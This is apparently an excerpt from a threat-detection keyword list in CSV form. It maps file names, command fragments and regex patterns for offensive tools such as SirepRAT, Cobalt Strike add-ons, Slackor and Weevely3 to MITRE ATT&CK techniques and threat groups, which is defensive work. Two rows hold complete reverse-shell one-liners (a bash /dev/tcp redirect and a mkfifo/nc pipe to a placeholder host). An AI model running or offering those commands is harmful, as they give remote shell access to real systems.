"*sipdump2john.py*",".{0,1000}sipdump2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","59564"
"*sipvicious_svcrack* -u100",".{0,1000}sipvicious_svcrack.{0,1000}\s\-u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59565"
"*SirepRAT.py *",".{0,1000}SirepRAT\.py\s.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59566"
"*SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_Slides.pdf*",".{0,1000}SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_Slides\.pdf.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59567"
"*SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_White_Paper.pdf*",".{0,1000}SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_White_Paper\.pdf.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59568"
"*SirepRAT-2.0.0.zip*",".{0,1000}SirepRAT\-2\.0\.0\.zip.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59569"
"*sitadel http://*",".{0,1000}sitadel\shttp\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59571"
"*sitadel https://*",".{0,1000}sitadel\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59572"
"*sitadel.py *",".{0,1000}sitadel\.py\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59573"
"*Sitadel-master.zip*",".{0,1000}Sitadel\-master\.zip.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","1","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59574"
"*site-packages/wfuzz*",".{0,1000}site\-packages\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","59575"
"*-Situational-Awareness-BOF*",".{0,1000}\-Situational\-Awareness\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","59576"
"*six2dez/reconftw*",".{0,1000}six2dez\/reconftw.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","59577"
"*skaffold run -m nemesis *",".{0,1000}skaffold\srun\s\-m\snemesis\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","59578"
"*skahwah*wordsmith*",".{0,1000}skahwah.{0,1000}wordsmith.{0,1000}","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","N/A","2","167","20","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z","59579"
"*skalkoto/winexe*",".{0,1000}skalkoto\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","59580"
"*skelsec/evilrdp*",".{0,1000}skelsec\/evilrdp.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","59581"
"*skelsec/jackdaw*",".{0,1000}skelsec\/jackdaw.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","59582"
"*skelsec/pysnaffler*",".{0,1000}skelsec\/pysnaffler.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","59583"
"*SkipPasswordAgeCheck*",".{0,1000}SkipPasswordAgeCheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59584"
"*SkipPortScan*",".{0,1000}SkipPortScan.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59585"
"*sknux/CVE-2021-21985_PoC*",".{0,1000}sknux\/CVE\-2021\-21985_PoC.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","1","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","59586"
"*skymem-get-mails *",".{0,1000}skymem\-get\-mails\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","59588"
"*SkyperTHC/bpf-keylogger*",".{0,1000}SkyperTHC\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","59589"
"*SLACKAES256Handler.*",".{0,1000}SLACKAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","59590"
"*slackor.db*",".{0,1000}slackor\.db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","59591"
"*Slackor\impacket*",".{0,1000}Slackor\\impacket.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","59592"
"*-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>*",".{0,1000}\-slave\s\s\<ConnectHost\>\s\<ConnectPort\>\s\<TransmitHost\>\s\<TransmitPort\>.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","59593"
"*sleep 1; /bin/bash -c \'${shell} 0</dev/tcp/${lhost}/${port} 1>&0 2>&0*",".{0,1000}sleep\s1\;\s\/bin\/bash\s\-c\s\\\'\$\{shell\}\s0\<\/dev\/tcp\/\$\{lhost\}\/\$\{port\}\s1\>\&0\s2\>\&0.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","#linux","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","59594"
"*sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc ${lhost} ${port} >/tmp/f*",".{0,1000}sleep\s1\;\srm\s\-rf\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|\$\{shell\}\s\-i\s2\>\&1\|nc\s\$\{lhost\}\s\$\{port\}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","59595"
"*Sleep for * ms* redirect to KrakenMask !*",".{0,1000}Sleep\sfor\s.{0,1000}\sms.{0,1000}\sredirect\sto\sKrakenMask\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","59596"
"*sleep_python_bridge.sleepy*",".{0,1000}sleep_python_bridge\.sleepy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59597"
"*sleep_python_bridge.striker*",".{0,1000}sleep_python_bridge\.striker.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59598"
"*Sleeping for 10 seconds to avoid in-memory AV scan*",".{0,1000}Sleeping\sfor\s10\sseconds\sto\savoid\sin\-memory\sAV\sscan.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","59599"
"*sleepmask.x64.o*",".{0,1000}sleepmask\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59600"
"*sleepmask.x86.o*",".{0,1000}sleepmask\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59601"
"*sleepmask_pivot.x64.o*",".{0,1000}sleepmask_pivot\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59602"
"*sleepmask_pivot.x86.o*",".{0,1000}sleepmask_pivot\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59603"
"*slemire/WSPCoerce*",".{0,1000}slemire\/WSPCoerce.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","59604"
